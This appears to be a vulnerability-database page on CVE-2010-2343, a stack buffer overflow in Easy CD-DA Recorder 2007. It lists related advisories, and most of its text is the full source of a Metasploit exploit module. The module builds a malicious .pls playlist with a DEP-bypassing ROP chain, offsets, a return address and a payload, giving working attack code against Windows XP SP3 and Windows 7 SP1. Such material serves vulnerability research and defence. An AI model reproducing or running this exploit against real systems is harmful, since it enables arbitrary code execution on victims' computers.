Easy CD-DA Recorder PLS Buffer Overflow vulnerability in 2007 version. Playlist entry triggers stack-based buffer overflow on Windows XP SP3 and Windows 7 SP1, leading to remote code execution or application crash.
Reporter | Title | Published | Views | Family All 11 |
---|---|---|---|---|
Exploit DB | Easy CD-DA Recorder - '.pls' Local Buffer Overflow (Metasploit) | 13 Feb 201400:00 | – | exploitdb |
Exploit DB | Audio Converter 8.1 - Local Stack Buffer Overflow ROP/WPM | 7 Jun 201000:00 | – | exploitdb |
Exploit DB | Audio Converter 8.1 - Local Stack Buffer Overflow | 7 Jun 201000:00 | – | exploitdb |
Exploit DB | Easy CD-DA Recorder 2007 - Local Buffer Overflow (SEH) | 7 Jun 201000:00 | – | exploitdb |
NVD | CVE-2010-2343 | 21 Jun 201015:30 | – | nvd |
CVE | CVE-2010-2343 | 21 Jun 201015:30 | – | cve |
Metasploit | Easy CD-DA Recorder PLS Buffer Overflow | 10 Feb 201419:46 | – | metasploit |
0day.today | Easy CD-DA Recorder PLS Buffer Overflow Exploit | 13 Feb 201400:00 | – | zdt |
Check Point Advisories | D.R. Software Easy CD-DA Recorder PLS Buffer Overflow (CVE-2010-2343) | 20 Sep 201600:00 | – | checkpoint_advisories |
Prion | Stack overflow | 21 Jun 201015:30 | – | prion |
`##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
By persuading the victim to open a specially-crafted .PLS file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on
Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'chap0', # Vulnerability discovery and original exploit
'Gabor Seljan', # Metasploit module
'juan vazquez' # Improved reliability
],
'References' =>
[
[ 'BID', '40631' ],
[ 'EDB', '13761' ],
[ 'OSVDB', '65256' ],
[ 'CVE', '2010-2343' ],
[ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x0a\x3d",
'Space' => 2454,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # ADD ESP,-3500
},
'Targets' =>
[
[ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',
# easycdda.exe 3.0.114.0
# audconv.dll 7.0.815.0
{
'Offset' => 1108,
'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 7 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])
],
self.class)
end
def nops
return make_nops(4).unpack("V").first
end
def rop_nops(n = 1)
# RETN (ROP NOP) [audconv.dll]
[0x1003d55d].pack('V') * n
end
def exploit
# ROP chain generated by mona.py - See corelan.be
rop_gadgets =
[
0x1007261e, # POP EDX # RETN [audconv.dll]
0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe]
0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]
0x10035802, # XCHG EAX,ESI # RETN [audconv.dll]
0x1005d288, # POP EBP # RETN [audconv.dll]
0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]
0x1005cc2d, # POP EBX # RETN [audconv.dll]
0x00000996, # 0x00000996-> EBX
0x1008740c, # POP EDX # RETN [audconv.dll]
0x00000040, # 0x00000040-> EDX
0x1001826d, # POP ECX # RETN [audconv.dll]
0x004364c6, # &Writable location [easycdda.exe]
0x00404aa9, # POP EDI # RETN [easycdda.exe]
0x100378e6, # RETN (ROP NOP) [audconv.dll]
0x0042527d, # POP EAX # RETN [easycdda.exe]
nops,
0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
].flatten.pack('V*')
sploit = rop_nops(target['Offset'] / 4)
sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
sploit << [target.ret].pack("V")
sploit << rop_nops(22)
sploit << rop_gadgets
sploit << payload.encoded
sploit << rand_text_alpha_upper(10000) # Generate exception
# Create the file
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo